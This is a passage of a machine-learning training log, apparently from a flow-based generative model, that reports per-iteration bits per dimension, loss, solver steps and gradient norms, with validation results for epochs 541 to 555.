Bit/dim 1.0736(1.0743) | Xent 0.0000(0.0000) | Loss 1.0736(1.0743) | Error 0.0000(0.0000) Steps 452(449.42) | Grad Norm 0.0833(0.0825) | Total Time 10.00(10.00)\nIter 5763 | Time 39.7363(40.6127) | Bit/dim 1.0752(1.0743) | Xent 0.0000(0.0000) | Loss 1.0752(1.0743) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0821(0.0825) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0541 | Time 15.1237, Epoch Time 309.8301(311.5688), Bit/dim 1.0684(best: 1.0688), Xent 0.0000, Loss 1.0684, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5764 | Time 40.2170(40.6009) | Bit/dim 1.0703(1.0742) | Xent 0.0000(0.0000) | Loss 1.0703(1.0742) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.1216(0.0836) | Total Time 10.00(10.00)\nIter 5765 | Time 40.0066(40.5830) | Bit/dim 1.0739(1.0742) | Xent 0.0000(0.0000) | Loss 1.0739(1.0742) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.0486(0.0826) | Total Time 10.00(10.00)\nIter 5766 | Time 40.2742(40.5738) | Bit/dim 1.0781(1.0743) | Xent 0.0000(0.0000) | Loss 1.0781(1.0743) | Error 0.0000(0.0000) Steps 446(449.20) | Grad Norm 0.0650(0.0821) | Total Time 10.00(10.00)\nIter 5767 | Time 41.9508(40.6151) | Bit/dim 1.0680(1.0741) | Xent 0.0000(0.0000) | Loss 1.0680(1.0741) | Error 0.0000(0.0000) Steps 446(449.10) | Grad Norm 0.2296(0.0865) | Total Time 10.00(10.00)\nIter 5768 | Time 42.7777(40.6800) | Bit/dim 1.0755(1.0741) | Xent 0.0000(0.0000) | Loss 1.0755(1.0741) | Error 0.0000(0.0000) Steps 452(449.19) | Grad Norm 0.1155(0.0874) | Total Time 10.00(10.00)\nIter 5769 | Time 39.7799(40.6530) | Bit/dim 1.0740(1.0741) | Xent 0.0000(0.0000) | Loss 1.0740(1.0741) | Error 0.0000(0.0000) Steps 446(449.09) | Grad Norm 0.1146(0.0882) | Total Time 10.00(10.00)\nIter 5770 | Time 40.9789(40.6627) | Bit/dim 1.0777(1.0742) | Xent 0.0000(0.0000) | Loss 1.0777(1.0742) | Error 0.0000(0.0000) Steps 452(449.18) | Grad Norm 0.1693(0.0906) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0542 | Time 15.0047, Epoch Time 313.3738(311.6230), Bit/dim 1.0691(best: 1.0684), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5771 | Time 40.4650(40.6568) | Bit/dim 1.0785(1.0744) | Xent 0.0000(0.0000) | Loss 1.0785(1.0744) | Error 0.0000(0.0000) Steps 452(449.27) | Grad Norm 0.1269(0.0917) | Total Time 10.00(10.00)\nIter 5772 | Time 40.9434(40.6654) | Bit/dim 1.0735(1.0743) | Xent 0.0000(0.0000) | Loss 1.0735(1.0743) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.0569(0.0907) | Total Time 10.00(10.00)\nIter 5773 | Time 41.0665(40.6774) | Bit/dim 1.0674(1.0741) | Xent 0.0000(0.0000) | Loss 1.0674(1.0741) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.1132(0.0913) | Total Time 10.00(10.00)\nIter 5774 | Time 40.5860(40.6747) | Bit/dim 1.0724(1.0741) | Xent 0.0000(0.0000) | Loss 1.0724(1.0741) | Error 0.0000(0.0000) Steps 458(449.68) | Grad Norm 0.1313(0.0925) | Total Time 10.00(10.00)\nIter 5775 | Time 41.7113(40.7058) | Bit/dim 1.0748(1.0741) | Xent 0.0000(0.0000) | Loss 1.0748(1.0741) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0799(0.0921) | Total Time 10.00(10.00)\nIter 5776 | Time 40.3452(40.6950) | Bit/dim 1.0793(1.0743) | Xent 0.0000(0.0000) | Loss 1.0793(1.0743) | Error 0.0000(0.0000) Steps 452(449.82) | Grad Norm 0.0689(0.0915) | Total Time 10.00(10.00)\nIter 5777 | Time 41.1296(40.7080) | Bit/dim 1.0747(1.0743) | Xent 0.0000(0.0000) | Loss 1.0747(1.0743) | Error 0.0000(0.0000) Steps 446(449.71) | Grad Norm 0.1126(0.0921) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0543 | Time 15.1179, Epoch Time 313.6788(311.6846), Bit/dim 1.0696(best: 1.0684), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5778 | Time 41.1198(40.7204) | Bit/dim 1.0707(1.0742) | Xent 0.0000(0.0000) | Loss 1.0707(1.0742) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.1417(0.0936) | Total Time 10.00(10.00)\nIter 5779 | Time 42.6128(40.7771) | Bit/dim 1.0781(1.0743) | Xent 0.0000(0.0000) | Loss 1.0781(1.0743) | Error 0.0000(0.0000) Steps 446(449.66) | Grad Norm 0.0604(0.0926) | Total Time 10.00(10.00)\nIter 5780 | Time 40.4521(40.7674) | Bit/dim 1.0764(1.0743) | Xent 0.0000(0.0000) | Loss 1.0764(1.0743) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.0589(0.0916) | Total Time 10.00(10.00)\nIter 5781 | Time 40.2465(40.7518) | Bit/dim 1.0748(1.0744) | Xent 0.0000(0.0000) | Loss 1.0748(1.0744) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.1452(0.0932) | Total Time 10.00(10.00)\nIter 5782 | Time 42.2249(40.7960) | Bit/dim 1.0711(1.0743) | Xent 0.0000(0.0000) | Loss 1.0711(1.0743) | Error 0.0000(0.0000) Steps 452(449.87) | Grad Norm 0.1287(0.0942) | Total Time 10.00(10.00)\nIter 5783 | Time 42.4821(40.8465) | Bit/dim 1.0745(1.0743) | Xent 0.0000(0.0000) | Loss 1.0745(1.0743) | Error 0.0000(0.0000) Steps 452(449.93) | Grad Norm 0.0731(0.0936) | Total Time 10.00(10.00)\nIter 5784 | Time 41.8102(40.8754) | Bit/dim 1.0715(1.0742) | Xent 0.0000(0.0000) | Loss 1.0715(1.0742) | Error 0.0000(0.0000) Steps 446(449.81) | Grad Norm 0.0782(0.0931) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0544 | Time 15.1077, Epoch Time 318.4499(311.8876), Bit/dim 1.0696(best: 1.0684), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5785 | Time 41.1194(40.8828) | Bit/dim 1.0773(1.0743) | Xent 0.0000(0.0000) | Loss 1.0773(1.0743) | Error 0.0000(0.0000) Steps 446(449.70) | Grad Norm 0.1751(0.0956) | Total Time 10.00(10.00)\nIter 5786 | Time 39.7239(40.8480) | Bit/dim 1.0756(1.0743) | Xent 0.0000(0.0000) | Loss 1.0756(1.0743) | Error 0.0000(0.0000) Steps 446(449.59) | Grad Norm 0.0804(0.0952) | Total Time 10.00(10.00)\nIter 5787 | Time 40.6914(40.8433) | Bit/dim 1.0753(1.0743) | Xent 0.0000(0.0000) | Loss 1.0753(1.0743) | Error 0.0000(0.0000) Steps 452(449.66) | Grad Norm 0.0661(0.0943) | Total Time 10.00(10.00)\nIter 5788 | Time 42.8710(40.9041) | Bit/dim 1.0750(1.0744) | Xent 0.0000(0.0000) | Loss 1.0750(1.0744) | Error 0.0000(0.0000) Steps 446(449.55) | Grad Norm 0.1182(0.0950) | Total Time 10.00(10.00)\nIter 5789 | Time 42.0396(40.9382) | Bit/dim 1.0727(1.0743) | Xent 0.0000(0.0000) | Loss 1.0727(1.0743) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0933(0.0949) | Total Time 10.00(10.00)\nIter 5790 | Time 41.2989(40.9490) | Bit/dim 1.0714(1.0742) | Xent 0.0000(0.0000) | Loss 1.0714(1.0742) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0631(0.0940) | Total Time 10.00(10.00)\nIter 5791 | Time 40.0505(40.9221) | Bit/dim 1.0751(1.0743) | Xent 0.0000(0.0000) | Loss 1.0751(1.0743) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.1176(0.0947) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0545 | Time 15.3664, Epoch Time 315.5962(311.9989), Bit/dim 1.0692(best: 1.0684), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5792 | Time 40.6560(40.9141) | Bit/dim 1.0740(1.0742) | Xent 0.0000(0.0000) | Loss 1.0740(1.0742) | Error 0.0000(0.0000) Steps 452(449.49) | Grad Norm 0.0507(0.0934) | Total Time 10.00(10.00)\nIter 5793 | Time 40.5851(40.9042) | Bit/dim 1.0747(1.0743) | Xent 0.0000(0.0000) | Loss 1.0747(1.0743) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0852(0.0931) | Total Time 10.00(10.00)\nIter 5794 | Time 40.9930(40.9069) | Bit/dim 1.0750(1.0743) | Xent 0.0000(0.0000) | Loss 1.0750(1.0743) | Error 0.0000(0.0000) Steps 446(449.46) | Grad Norm 0.0568(0.0920) | Total Time 10.00(10.00)\nIter 5795 | Time 39.0869(40.8523) | Bit/dim 1.0700(1.0742) | Xent 0.0000(0.0000) | Loss 1.0700(1.0742) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.0908(0.0920) | Total Time 10.00(10.00)\nIter 5796 | Time 40.4318(40.8397) | Bit/dim 1.0708(1.0741) | Xent 0.0000(0.0000) | Loss 1.0708(1.0741) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.0730(0.0914) | Total Time 10.00(10.00)\nIter 5797 | Time 40.5162(40.8300) | Bit/dim 1.0766(1.0741) | Xent 0.0000(0.0000) | Loss 1.0766(1.0741) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.0722(0.0909) | Total Time 10.00(10.00)\nIter 5798 | Time 40.6429(40.8243) | Bit/dim 1.0737(1.0741) | Xent 0.0000(0.0000) | Loss 1.0737(1.0741) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0847(0.0907) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0546 | Time 15.2672, Epoch Time 311.0063(311.9691), Bit/dim 1.0690(best: 1.0684), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5799 | Time 38.8530(40.7652) | Bit/dim 1.0802(1.0743) | Xent 0.0000(0.0000) | Loss 1.0802(1.0743) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0946(0.0908) | Total Time 10.00(10.00)\nIter 5800 | Time 40.6764(40.7625) | Bit/dim 1.0743(1.0743) | Xent 0.0000(0.0000) | Loss 1.0743(1.0743) | Error 0.0000(0.0000) Steps 446(449.22) | Grad Norm 0.0576(0.0898) | Total Time 10.00(10.00)\nIter 5801 | Time 40.7695(40.7628) | Bit/dim 1.0778(1.0744) | Xent 0.0000(0.0000) | Loss 1.0778(1.0744) | Error 0.0000(0.0000) Steps 458(449.49) | Grad Norm 0.0635(0.0890) | Total Time 10.00(10.00)\nIter 5802 | Time 40.6674(40.7599) | Bit/dim 1.0774(1.0745) | Xent 0.0000(0.0000) | Loss 1.0774(1.0745) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0677(0.0884) | Total Time 10.00(10.00)\nIter 5803 | Time 41.9698(40.7962) | Bit/dim 1.0687(1.0743) | Xent 0.0000(0.0000) | Loss 1.0687(1.0743) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0584(0.0875) | Total Time 10.00(10.00)\nIter 5804 | Time 41.8678(40.8283) | Bit/dim 1.0709(1.0742) | Xent 0.0000(0.0000) | Loss 1.0709(1.0742) | Error 0.0000(0.0000) Steps 446(449.53) | Grad Norm 0.0603(0.0867) | Total Time 10.00(10.00)\nIter 5805 | Time 41.0912(40.8362) | Bit/dim 1.0690(1.0741) | Xent 0.0000(0.0000) | Loss 1.0690(1.0741) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.0694(0.0861) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0547 | Time 14.9700, Epoch Time 313.4291(312.0129), Bit/dim 1.0684(best: 1.0684), Xent 0.0000, Loss 1.0684, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5806 | Time 40.9615(40.8400) | Bit/dim 1.0764(1.0741) | Xent 0.0000(0.0000) | Loss 1.0764(1.0741) | Error 0.0000(0.0000) Steps 446(449.49) | Grad Norm 0.0653(0.0855) | Total Time 10.00(10.00)\nIter 5807 | Time 41.2457(40.8522) | Bit/dim 1.0708(1.0740) | Xent 0.0000(0.0000) | Loss 1.0708(1.0740) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0620(0.0848) | Total Time 10.00(10.00)\nIter 5808 | Time 39.8205(40.8212) | Bit/dim 1.0708(1.0739) | Xent 0.0000(0.0000) | Loss 1.0708(1.0739) | Error 0.0000(0.0000) Steps 452(449.64) | Grad Norm 0.0632(0.0842) | Total Time 10.00(10.00)\nIter 5809 | Time 39.2704(40.7747) | Bit/dim 1.0775(1.0740) | Xent 0.0000(0.0000) | Loss 1.0775(1.0740) | Error 0.0000(0.0000) Steps 452(449.71) | Grad Norm 0.0721(0.0838) | Total Time 10.00(10.00)\nIter 5810 | Time 39.9673(40.7505) | Bit/dim 1.0733(1.0740) | Xent 0.0000(0.0000) | Loss 1.0733(1.0740) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.0808(0.0837) | Total Time 10.00(10.00)\nIter 5811 | Time 41.2429(40.7652) | Bit/dim 1.0747(1.0740) | Xent 0.0000(0.0000) | Loss 1.0747(1.0740) | Error 0.0000(0.0000) Steps 446(449.67) | Grad Norm 0.0609(0.0830) | Total Time 10.00(10.00)\nIter 5812 | Time 40.2485(40.7497) | Bit/dim 1.0726(1.0740) | Xent 0.0000(0.0000) | Loss 1.0726(1.0740) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0625(0.0824) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0548 | Time 15.0060, Epoch Time 310.3326(311.9625), Bit/dim 1.0688(best: 1.0684), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5813 | Time 39.8633(40.7231) | Bit/dim 1.0750(1.0740) | Xent 0.0000(0.0000) | Loss 1.0750(1.0740) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0605(0.0817) | Total Time 10.00(10.00)\nIter 5814 | Time 40.8356(40.7265) | Bit/dim 1.0697(1.0739) | Xent 0.0000(0.0000) | Loss 1.0697(1.0739) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0596(0.0811) | Total Time 10.00(10.00)\nIter 5815 | Time 42.0255(40.7655) | Bit/dim 1.0739(1.0739) | Xent 0.0000(0.0000) | Loss 1.0739(1.0739) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.0691(0.0807) | Total Time 10.00(10.00)\nIter 5816 | Time 43.8371(40.8576) | Bit/dim 1.0749(1.0739) | Xent 0.0000(0.0000) | Loss 1.0749(1.0739) | Error 0.0000(0.0000) Steps 452(449.49) | Grad Norm 0.0812(0.0807) | Total Time 10.00(10.00)\nIter 5817 | Time 40.9931(40.8617) | Bit/dim 1.0741(1.0739) | Xent 0.0000(0.0000) | Loss 1.0741(1.0739) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0782(0.0807) | Total Time 10.00(10.00)\nIter 5818 | Time 40.2804(40.8443) | Bit/dim 1.0715(1.0739) | Xent 0.0000(0.0000) | Loss 1.0715(1.0739) | Error 0.0000(0.0000) Steps 452(449.64) | Grad Norm 0.0890(0.0809) | Total Time 10.00(10.00)\nIter 5819 | Time 39.3067(40.7981) | Bit/dim 1.0747(1.0739) | Xent 0.0000(0.0000) | Loss 1.0747(1.0739) | Error 0.0000(0.0000) Steps 446(449.53) | Grad Norm 0.1479(0.0829) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0549 | Time 15.1366, Epoch Time 314.8808(312.0500), Bit/dim 1.0685(best: 1.0684), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5820 | Time 40.5378(40.7903) | Bit/dim 1.0744(1.0739) | Xent 0.0000(0.0000) | Loss 1.0744(1.0739) | Error 0.0000(0.0000) Steps 452(449.61) | Grad Norm 0.1560(0.0851) | Total Time 10.00(10.00)\nIter 5821 | Time 41.3878(40.8082) | Bit/dim 1.0767(1.0740) | Xent 0.0000(0.0000) | Loss 1.0767(1.0740) | Error 0.0000(0.0000) Steps 446(449.50) | Grad Norm 0.0870(0.0852) | Total Time 10.00(10.00)\nIter 5822 | Time 38.9487(40.7525) | Bit/dim 1.0711(1.0739) | Xent 0.0000(0.0000) | Loss 1.0711(1.0739) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0841(0.0851) | Total Time 10.00(10.00)\nIter 5823 | Time 40.7921(40.7536) | Bit/dim 1.0706(1.0738) | Xent 0.0000(0.0000) | Loss 1.0706(1.0738) | Error 0.0000(0.0000) Steps 452(449.65) | Grad Norm 0.1119(0.0859) | Total Time 10.00(10.00)\nIter 5824 | Time 39.3943(40.7129) | Bit/dim 1.0773(1.0739) | Xent 0.0000(0.0000) | Loss 1.0773(1.0739) | Error 0.0000(0.0000) Steps 452(449.72) | Grad Norm 0.1176(0.0869) | Total Time 10.00(10.00)\nIter 5825 | Time 40.6860(40.7121) | Bit/dim 1.0730(1.0739) | Xent 0.0000(0.0000) | Loss 1.0730(1.0739) | Error 0.0000(0.0000) Steps 446(449.60) | Grad Norm 0.1171(0.0878) | Total Time 10.00(10.00)\nIter 5826 | Time 40.5361(40.7068) | Bit/dim 1.0786(1.0740) | Xent 0.0000(0.0000) | Loss 1.0786(1.0740) | Error 0.0000(0.0000) Steps 452(449.68) | Grad Norm 0.0565(0.0869) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0550 | Time 15.2524, Epoch Time 310.0053(311.9887), Bit/dim 1.0692(best: 1.0684), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5827 | Time 40.3807(40.6970) | Bit/dim 1.0758(1.0741) | Xent 0.0000(0.0000) | Loss 1.0758(1.0741) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0642(0.0862) | Total Time 10.00(10.00)\nIter 5828 | Time 41.4661(40.7201) | Bit/dim 1.0744(1.0741) | Xent 0.0000(0.0000) | Loss 1.0744(1.0741) | Error 0.0000(0.0000) Steps 452(449.81) | Grad Norm 0.1254(0.0874) | Total Time 10.00(10.00)\nIter 5829 | Time 41.0062(40.7287) | Bit/dim 1.0727(1.0740) | Xent 0.0000(0.0000) | Loss 1.0727(1.0740) | Error 0.0000(0.0000) Steps 446(449.70) | Grad Norm 0.0638(0.0866) | Total Time 10.00(10.00)\nIter 5830 | Time 39.9774(40.7061) | Bit/dim 1.0738(1.0740) | Xent 0.0000(0.0000) | Loss 1.0738(1.0740) | Error 0.0000(0.0000) Steps 452(449.77) | Grad Norm 0.0588(0.0858) | Total Time 10.00(10.00)\nIter 5831 | Time 40.0386(40.6861) | Bit/dim 1.0736(1.0740) | Xent 0.0000(0.0000) | Loss 1.0736(1.0740) | Error 0.0000(0.0000) Steps 452(449.84) | Grad Norm 0.0764(0.0855) | Total Time 10.00(10.00)\nIter 5832 | Time 40.4335(40.6785) | Bit/dim 1.0731(1.0740) | Xent 0.0000(0.0000) | Loss 1.0731(1.0740) | Error 0.0000(0.0000) Steps 446(449.72) | Grad Norm 0.1083(0.0862) | Total Time 10.00(10.00)\nIter 5833 | Time 41.4154(40.7006) | Bit/dim 1.0710(1.0739) | Xent 0.0000(0.0000) | Loss 1.0710(1.0739) | Error 0.0000(0.0000) Steps 452(449.79) | Grad Norm 0.0705(0.0857) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0551 | Time 15.0817, Epoch Time 312.0242(311.9897), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5834 | Time 40.0146(40.6800) | Bit/dim 1.0751(1.0739) | Xent 0.0000(0.0000) | Loss 1.0751(1.0739) | Error 0.0000(0.0000) Steps 452(449.85) | Grad Norm 0.0674(0.0852) | Total Time 10.00(10.00)\nIter 5835 | Time 41.5879(40.7073) | Bit/dim 1.0714(1.0739) | Xent 0.0000(0.0000) | Loss 1.0714(1.0739) | Error 0.0000(0.0000) Steps 452(449.92) | Grad Norm 0.0590(0.0844) | Total Time 10.00(10.00)\nIter 5836 | Time 39.2206(40.6627) | Bit/dim 1.0728(1.0738) | Xent 0.0000(0.0000) | Loss 1.0728(1.0738) | Error 0.0000(0.0000) Steps 452(449.98) | Grad Norm 0.0994(0.0849) | Total Time 10.00(10.00)\nIter 5837 | Time 39.5392(40.6290) | Bit/dim 1.0702(1.0737) | Xent 0.0000(0.0000) | Loss 1.0702(1.0737) | Error 0.0000(0.0000) Steps 446(449.86) | Grad Norm 0.0711(0.0844) | Total Time 10.00(10.00)\nIter 5838 | Time 39.6920(40.6009) | Bit/dim 1.0757(1.0738) | Xent 0.0000(0.0000) | Loss 1.0757(1.0738) | Error 0.0000(0.0000) Steps 446(449.75) | Grad Norm 0.1214(0.0856) | Total Time 10.00(10.00)\nIter 5839 | Time 40.4479(40.5963) | Bit/dim 1.0738(1.0738) | Xent 0.0000(0.0000) | Loss 1.0738(1.0738) | Error 0.0000(0.0000) Steps 446(449.63) | Grad Norm 0.1572(0.0877) | Total Time 10.00(10.00)\nIter 5840 | Time 42.9862(40.6680) | Bit/dim 1.0765(1.0739) | Xent 0.0000(0.0000) | Loss 1.0765(1.0739) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0857(0.0876) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0552 | Time 15.1409, Epoch Time 310.8707(311.9562), Bit/dim 1.0687(best: 1.0684), Xent 0.0000, Loss 1.0687, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5841 | Time 39.7968(40.6418) | Bit/dim 1.0730(1.0738) | Xent 0.0000(0.0000) | Loss 1.0730(1.0738) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.1510(0.0895) | Total Time 10.00(10.00)\nIter 5842 | Time 38.7682(40.5856) | Bit/dim 1.0765(1.0739) | Xent 0.0000(0.0000) | Loss 1.0765(1.0739) | Error 0.0000(0.0000) Steps 452(449.67) | Grad Norm 0.1810(0.0923) | Total Time 10.00(10.00)\nIter 5843 | Time 39.0102(40.5384) | Bit/dim 1.0751(1.0740) | Xent 0.0000(0.0000) | Loss 1.0751(1.0740) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0917(0.0923) | Total Time 10.00(10.00)\nIter 5844 | Time 40.5887(40.5399) | Bit/dim 1.0704(1.0738) | Xent 0.0000(0.0000) | Loss 1.0704(1.0738) | Error 0.0000(0.0000) Steps 446(449.45) | Grad Norm 0.1539(0.0941) | Total Time 10.00(10.00)\nIter 5845 | Time 40.5039(40.5388) | Bit/dim 1.0773(1.0740) | Xent 0.0000(0.0000) | Loss 1.0773(1.0740) | Error 0.0000(0.0000) Steps 452(449.53) | Grad Norm 0.1587(0.0961) | Total Time 10.00(10.00)\nIter 5846 | Time 41.7091(40.5739) | Bit/dim 1.0765(1.0740) | Xent 0.0000(0.0000) | Loss 1.0765(1.0740) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.0760(0.0955) | Total Time 10.00(10.00)\nIter 5847 | Time 39.2381(40.5338) | Bit/dim 1.0716(1.0740) | Xent 0.0000(0.0000) | Loss 1.0716(1.0740) | Error 0.0000(0.0000) Steps 446(449.50) | Grad Norm 0.0733(0.0948) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0553 | Time 15.3218, Epoch Time 307.4693(311.8216), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5848 | Time 39.8510(40.5133) | Bit/dim 1.0779(1.0741) | Xent 0.0000(0.0000) | Loss 1.0779(1.0741) | Error 0.0000(0.0000) Steps 458(449.75) | Grad Norm 0.1720(0.0971) | Total Time 10.00(10.00)\nIter 5849 | Time 41.9262(40.5557) | Bit/dim 1.0720(1.0740) | Xent 0.0000(0.0000) | Loss 1.0720(1.0740) | Error 0.0000(0.0000) Steps 452(449.82) | Grad Norm 0.0862(0.0968) | Total Time 10.00(10.00)\nIter 5850 | Time 40.3646(40.5500) | Bit/dim 1.0667(1.0738) | Xent 0.0000(0.0000) | Loss 1.0667(1.0738) | Error 0.0000(0.0000) Steps 458(450.06) | Grad Norm 0.0704(0.0960) | Total Time 10.00(10.00)\nIter 5851 | Time 39.6954(40.5244) | Bit/dim 1.0763(1.0739) | Xent 0.0000(0.0000) | Loss 1.0763(1.0739) | Error 0.0000(0.0000) Steps 446(449.94) | Grad Norm 0.1026(0.0962) | Total Time 10.00(10.00)\nIter 5852 | Time 42.8151(40.5931) | Bit/dim 1.0730(1.0738) | Xent 0.0000(0.0000) | Loss 1.0730(1.0738) | Error 0.0000(0.0000) Steps 446(449.82) | Grad Norm 0.1157(0.0968) | Total Time 10.00(10.00)\nIter 5853 | Time 40.4771(40.5896) | Bit/dim 1.0758(1.0739) | Xent 0.0000(0.0000) | Loss 1.0758(1.0739) | Error 0.0000(0.0000) Steps 452(449.89) | Grad Norm 0.1897(0.0996) | Total Time 10.00(10.00)\nIter 5854 | Time 39.6955(40.5628) | Bit/dim 1.0736(1.0739) | Xent 0.0000(0.0000) | Loss 1.0736(1.0739) | Error 0.0000(0.0000) Steps 446(449.77) | Grad Norm 0.0777(0.0989) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0554 | Time 15.3139, Epoch Time 312.5020(311.8420), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5855 | Time 40.8205(40.5705) | Bit/dim 1.0741(1.0739) | Xent 0.0000(0.0000) | Loss 1.0741(1.0739) | Error 0.0000(0.0000) Steps 458(450.02) | Grad Norm 0.1769(0.1012) | Total Time 10.00(10.00)\nIter 5856 | Time 41.9837(40.6129) | Bit/dim 1.0736(1.0739) | Xent 0.0000(0.0000) | Loss 1.0736(1.0739) | Error 0.0000(0.0000) Steps 446(449.90) | Grad Norm 0.1925(0.1040) | Total Time 10.00(10.00)\nIter 5857 | Time 42.3212(40.6642) | Bit/dim 1.0763(1.0740) | Xent 0.0000(0.0000) | Loss 1.0763(1.0740) | Error 0.0000(0.0000) Steps 452(449.96) | Grad Norm 0.0927(0.1036) | Total Time 10.00(10.00)\nIter 5858 | Time 40.1420(40.6485) | Bit/dim 1.0706(1.0739) | Xent 0.0000(0.0000) | Loss 1.0706(1.0739) | Error 0.0000(0.0000) Steps 446(449.84) | Grad Norm 0.1119(0.1039) | Total Time 10.00(10.00)\nIter 5859 | Time 41.5803(40.6764) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.73) | Grad Norm 0.1841(0.1063) | Total Time 10.00(10.00)\nIter 5860 | Time 40.1389(40.6603) | Bit/dim 1.0695(1.0737) | Xent 0.0000(0.0000) | Loss 1.0695(1.0737) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.0646(0.1050) | Total Time 10.00(10.00)\nIter 5861 | Time 41.0756(40.6728) | Bit/dim 1.0794(1.0739) | Xent 0.0000(0.0000) | Loss 1.0794(1.0739) | Error 0.0000(0.0000) Steps 458(450.04) | Grad Norm 0.1273(0.1057) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0555 | Time 15.1468, Epoch Time 315.7869(311.9603), Bit/dim 1.0689(best: 1.0684), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5862 | Time 40.2132(40.6590) | Bit/dim 1.0752(1.0739) | Xent 0.0000(0.0000) | Loss 1.0752(1.0739) | Error 0.0000(0.0000) Steps 446(449.92) | Grad Norm 0.1189(0.1061) | Total Time 10.00(10.00)\nIter 5863 | Time 40.5317(40.6552) | Bit/dim 1.0766(1.0740) | Xent 0.0000(0.0000) | Loss 1.0766(1.0740) | Error 0.0000(0.0000) Steps 446(449.80) | Grad Norm 0.0712(0.1051) | Total Time 10.00(10.00)\nIter 5864 | Time 39.5063(40.6207) | Bit/dim 1.0706(1.0739) | Xent 0.0000(0.0000) | Loss 1.0706(1.0739) | Error 0.0000(0.0000) Steps 446(449.69) | Grad Norm 0.0566(0.1036) | Total Time 10.00(10.00)\nIter 5865 | Time 41.2043(40.6382) | Bit/dim 1.0745(1.0739) | Xent 0.0000(0.0000) | Loss 1.0745(1.0739) | Error 0.0000(0.0000) Steps 452(449.76) | Grad Norm 0.1209(0.1041) | Total Time 10.00(10.00)\nIter 5866 | Time 41.5521(40.6656) | Bit/dim 1.0727(1.0739) | Xent 0.0000(0.0000) | Loss 1.0727(1.0739) | Error 0.0000(0.0000) Steps 452(449.83) | Grad Norm 